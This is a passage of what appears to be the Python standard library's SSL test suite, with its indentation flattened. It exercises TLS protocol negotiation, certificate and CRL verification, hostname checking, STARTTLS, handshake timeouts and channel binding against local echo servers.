return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with closing(socket.socket()) as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % x.args[1])
except OSError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\OSError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake isn't
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].recv(1)
t = threading.Thread(target=serve)
t.start()
            # Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
